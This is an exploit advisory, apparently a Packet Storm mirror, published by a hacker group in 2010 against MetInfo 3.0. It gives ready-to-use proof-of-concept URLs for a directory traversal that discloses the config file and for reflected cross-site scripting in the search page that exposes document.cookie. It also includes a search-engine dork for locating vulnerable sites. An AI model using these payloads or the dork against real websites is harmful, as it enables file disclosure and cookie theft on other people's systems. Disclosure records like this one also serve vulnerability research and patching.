Metinfo version 3.0 suffers from cross site scripting and file disclosure vulnerabilities.
7f319f2402a28e5e4096eaa10b19faff0ce156e97e765e047a4884bd747ffe1b# Exploit Title: metinfo3.0 Mullti Vulnerability
# Date : 10-11-2010
# Author : anT!-Tr0J4n
# Version : 3.0
#DorK : Powered by MetInfo 3.0
# Home : www.Dev-PoinT.com : http://milw0rm.ws
#Email : D3v-PoinT[at]hotmail[d0t]com & C1EH[at]Hotmail[d0t]com
Vendor£ : http://www.metinfo.cn/
#Greetz : Dev-PoinT.com ; GlaDiatOr ;SILVER STAR ; HoBeeZ ; Coffin Of Evil ; Cyber-Err0r ; Mr.Mh$TEr ; M [Zero] ; R3d-D3v1l
#special thanks to milw0rm.ws team : r0073r,Sid3^effects,L0rd CruSad3r,SeeMe,Sonic,gunslinger_,Sn!pEr.S!Te,n4pst3rr,indoushka, KnocKout,SONiC,ZoRLu
========================================================
metinfo3.0 source code disclosure Vulnerability
========================================================
[>] exploit ->
[+] http://localhost/metinfo/templates/met001/../../ [file disclosure]
EX :
[+] http://localhost/metinfo/templates/met001/../../config
======================================================
[>] metinfo3.0 XSS Vulnerability
======================================================
[>] exploit -> XSS Vulnerability
http://localhost/metinfo/search/search.php?lang=en&class1=0&class2=0&class3=0&searchtype=0&searchword=[XSS]
http://localhost/metinfo/search/search.php?lang=en&class1=0&class2=0&class3=0&searchtype=0&searchword=1<script>alert(document.cookie)</script>
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] Site : Inj3ct0r.com
[+] Support e-mail : submit[at]inj3ct0r.com
[+] I'm anT!-Tr0J4n member from Inj3ct0r Team
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed